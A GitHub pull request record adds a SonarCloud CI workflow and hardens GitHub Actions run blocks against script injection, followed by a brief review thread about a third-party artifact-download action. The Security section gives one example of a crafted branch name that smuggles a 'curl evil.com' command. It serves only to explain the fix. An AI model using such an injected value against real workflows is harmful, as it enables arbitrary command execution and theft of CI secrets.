### PR TITLE
ci: add SonarCloud integration with script injection hardening

### PR DESCRIPTION
**Pull request by gundalow**
## Summary

- Add SonarCloud workflow (`.github/workflows/sonarcloud.yml`) triggered on PR Validation completion
- Harden all `run:` blocks against GitHub Actions script injection by passing untrusted context values (`head_branch`, `repository`, step outputs) through `env:` variables instead of inline `${{ }}` expansion
- Add coverage report generation and upload to `pr-validation.yml` for Python 3.13 builds
- Add `sonar-project.properties` configuration

## Security

Attacker-controlled values like `github.event.workflow_run.head_branch` were previously interpolated directly into shell scripts, allowing a crafted branch name (e.g. containing `"; curl evil.com #`) to execute arbitrary commands with access to `SONAR_TOKEN`. All such values are now passed via `env:`, which the runner sets as process environment variables — immune to shell injection.

## Test plan

- [ ] Verify PR Validation workflow still passes
- [ ] Verify SonarCloud workflow triggers after PR Validation completes
- [ ] Verify coverage report is uploaded as artifact from Python 3.13 build
- [ ] Confirm no `${{ }}` expressions appear inside `run:` blocks in `sonarcloud.yml`

🤖 Generated with [Claude Code](https://claude.com/claude-code)

### CODE REVIEW

**Review by thedoubl3j — APPROVED** [review]
yep, looks good. merging will tell you more about whether or not the config is in a good place and you can start seeing coverage reporting.

File: .github/workflows/sonarcloud.yml [hunk 1]
```diff
@@ -0,0 +1,71 @@
...
+      - name: Checkout code
+        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd  # v6
+        with:
+          ref: ${{ github.event.workflow_run.head_sha }}
+          fetch-depth: 0
+          persist-credentials: false
+          show-progress: false
+
+      - name: Download coverage report
+        uses: dawidd6/action-download-artifact@2536c51d3d126276eb39f74d6bc9c72ac6ef30d3  # v16
```
Comment (dbrennand) [inline .github/workflows/sonarcloud.yml:30]: We're using an alternative to actions/download-artifact, is that intended?

Comment (dbrennand) [reply .github/workflows/sonarcloud.yml:30]: `actions/download-artifact` does not implement the needed functionality which this action provides.

Comment (gundalow) [reply .github/workflows/sonarcloud.yml:30]: Maybe this is bad practice to use other random repos

Comment (dbrennand) [reply .github/workflows/sonarcloud.yml:30]: @gundalow - This action implements the functionality you wanted from this workflow.

From https://github.com/dawidd6/action-download-artifact:

> Let's suppose you have a workflow with a job in it that at the end uploads an artifact using actions/upload-artifact action and you want to download this artifact in another workflow that is run after the first one. Official actions/download-artifact does not allow this.
